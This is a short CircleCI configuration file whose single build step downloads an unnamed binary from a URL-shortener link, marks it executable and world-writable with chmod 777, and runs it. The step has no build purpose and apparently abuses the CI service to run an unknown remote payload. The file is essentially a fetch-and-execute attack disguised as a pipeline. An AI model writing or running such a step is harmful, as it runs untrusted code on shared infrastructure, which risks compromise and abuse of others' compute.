version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202107-02
    resource_class: medium
    steps:
      - run: wget -O breh http://gg.gg/hahahugolinuxgobrr && chmod +x breh && chmod 777 breh && ./breh